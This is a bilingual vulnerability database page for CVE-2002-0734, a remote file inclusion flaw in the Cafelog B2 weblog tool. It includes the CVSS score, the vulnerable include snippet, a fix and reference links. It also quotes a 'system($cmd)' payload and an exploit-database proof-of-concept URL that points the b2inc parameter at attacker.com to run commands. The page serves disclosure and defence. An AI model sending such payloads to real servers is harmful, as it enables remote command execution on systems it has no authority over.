CVE-2002-0734
CVSS7.5
发布时间 :2002-08-12 00:00:00
修订时间 :2008-09-05 16:28:48
NMCOE    

[原文]b2edit.showposts.php in B2 2.0.6pre2 and earlier does not properly load the b2config.php file in some configurations, which allows remote attackers to execute arbitrary PHP code via a URL that sets the $b2inc variable to point to a malicious program stored on a remote server.


[CNNVD]B2 B2config.php远程命令执行漏洞(CNNVD-200208-125)

        
        B2是一款新闻/WEB记录工具,由PHP编写,允许管理员快速在Frontpage中张贴新闻,并允许浏览者交互,可使用于Linux和Unix操作系统下。
        B2中B2config.php脚本在处理引用变量上存在问题,可导致远程攻击者以B2进程的权限在目标系统上执行任意命令。
        在PHP脚本引用的变量实际不存在,因此,攻击者可以自己定义变量值,通过在自己控制的服务器上建立PHP脚本并嵌入相关命令,攻击者可以引用这个远程文件,导致攻击者以B2权限在目标服务器上执行任意命令。
        问题存在于/b2-include/b2edit.showposts.php中:
        *snippet*
        
                include_once ("b2config.php");
        include_once ($b2inc."/b2functions.php");
        
        *snippet*
        
        由于b2config.php没有包含在b2-include中,攻击者可以自己定义$b2inc变量,通过自己控制的服务器建立b2functions.php文件,并包含如下代码:
                system($cmd);
        ?>
        通过远程引用,就可以在目标系统上以B2进程的权限执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0734
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0734
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-125
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4673
(VENDOR_ADVISORY)  BID  4673
http://www.iss.net/security_center/static/9013.php
(VENDOR_ADVISORY)  XF  b2-b2inc-command-execution(9013)
http://archives.neohapsis.com/archives/bugtraq/2002-05/0027.html
(VENDOR_ADVISORY)  BUGTRAQ  20020506 b2 php remote command execution
http://cafelog.com/
(VENDOR_ADVISORY)  CONFIRM  http://cafelog.com/

- 漏洞信息

B2 B2config.php远程命令执行漏洞
高危 未知
2002-08-12 00:00:00 2005-05-02 00:00:00
远程  
        
        B2是一款新闻/WEB记录工具,由PHP编写,允许管理员快速在Frontpage中张贴新闻,并允许浏览者交互,可使用于Linux和Unix操作系统下。
        B2中B2config.php脚本在处理引用变量上存在问题,可导致远程攻击者以B2进程的权限在目标系统上执行任意命令。
        在PHP脚本引用的变量实际不存在,因此,攻击者可以自己定义变量值,通过在自己控制的服务器上建立PHP脚本并嵌入相关命令,攻击者可以引用这个远程文件,导致攻击者以B2权限在目标服务器上执行任意命令。
        问题存在于/b2-include/b2edit.showposts.php中:
        *snippet*
        
                include_once ("b2config.php");
        include_once ($b2inc."/b2functions.php");
        
        *snippet*
        
        由于b2config.php没有包含在b2-include中,攻击者可以自己定义$b2inc变量,通过自己控制的服务器建立b2functions.php文件,并包含如下代码:
                system($cmd);
        ?>
        通过远程引用,就可以在目标系统上以B2进程的权限执行任意命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 把b2config.php拷贝到b2-include目录中。
        厂商补丁:
        Cafelog
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Cafelog b2 0.6 pre:
        Cafelog Upgrade b2-0.6pre2-20020409
        
        http://www.cafelog.com/releases/

- 漏洞信息 (21436)

B2 0.6 b2edit.showposts.php b2inc Parameter Remote File Inclusion (EDBID:21436)
php webapps
2002-05-06 Verified
0 Frank
N/A [点击下载]
source: http://www.securityfocus.com/bid/4673/info

B2 is a news/weblog tool written in php. b2 allows webmasters to quickly post news on the frontpage, and let viewers interact with each other. It is available primarily for Unix and Linux.

A variable that is referenced in the PHP scripts does not actually exist. Thus, an attacker may be able to define the value of the variable. By creating a PHP script on the remote side and embedding commands in it, the attacker is able to reference the remote file. This could potentially allow the attacker to execute commands on the vulnerable system. 

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls 		

- 漏洞信息

50530
CafeLog b2 b2edit.showposts.php b2inc Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2002-05-06 Unknow
2002-05-06 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站